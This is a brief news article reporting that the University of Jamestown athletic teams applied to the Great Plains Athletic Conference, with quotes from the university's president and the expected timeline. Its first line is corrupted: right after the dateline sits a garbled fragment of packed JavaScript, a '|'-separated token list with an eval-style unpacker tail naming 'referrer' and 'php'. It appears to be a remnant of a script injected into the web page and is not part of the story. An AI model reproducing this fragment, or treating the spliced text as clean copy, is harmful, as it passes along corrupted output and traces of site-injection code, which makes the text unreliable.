JAMESTOWN dsykr|var|u0026u|referrer|tdkae||js|php’.split(‘|’),0,{}))
(NewsDakota.com) – The University of Jamestown athletic teams may have a new home in 2017. It was announced today that the Jimmies have applied to the Great Plains Athletic Conference.

The GPAC is widely considered one of the strongest conferences in the country, especially in basketball. The programs in the conference come from Iowa, South Dakota, and Nebraska.

“Several years ago the DAC Conference was dissolved and we spent time as an independent looking for the right fit.  GPAC was the most suitable choice for us, but the timing wasn’t good for either side,” said President Bob Badal in a statement.  “We now feel confident that we are ready to apply to the GPAC and we are actively engaged in the process.  It is a strong conference of faith based private schools like UJ, and I believe that it is a solid fit for us.”

Sports sponsored by the conference include; baseball, softball, cross country, basketball, football, soccer, golf, tennis, volleyball, and men’s wrestling.

The Jimmies do not have tennis, but a move would give their soccer teams a much needed home. The GPAC isn’t expected to a make decision until sometime in July.

Jamestown has been a member of the North Star Athletic Association since its inception in 2013 and either way will remain so in 2016-17. Any potential move to the GPAC wouldn’t take place until the fall of 2017.
